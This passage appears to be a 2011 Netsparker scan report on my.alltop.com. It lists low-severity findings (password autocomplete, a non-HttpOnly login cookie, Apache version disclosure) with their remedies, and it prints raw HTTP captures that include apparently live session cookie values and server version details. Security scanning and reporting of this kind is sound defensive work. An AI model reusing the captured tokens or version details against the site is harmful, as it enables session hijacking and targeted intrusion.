Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:03 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:03 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
..
Auto Complete Enabled

Auto Complete Enabled

1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /alpha/

/alpha/ CONFIRMED

http://my.alltop.com/alpha/

Identified Field Name

password

Request

GET /alpha/ HTTP/1.1
Referer: http://my.alltop.com/alpha/a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:03 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:03 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:03 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /topic/work

/topic/work CONFIRMED

http://my.alltop.com/topic/work

Identified Cookie

EPClientLogin

Request

GET /topic/work HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Tue, 08 Mar 2011 20:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:01 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Location: http://alltop.com/?keywords=topic
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 0


Apache Version Disclosure

Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /topic/tech

/topic/tech

http://my.alltop.com/topic/tech

Extracted Version

Apache/2.2.3 (Red Hat)

Request

GET /topic/tech HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
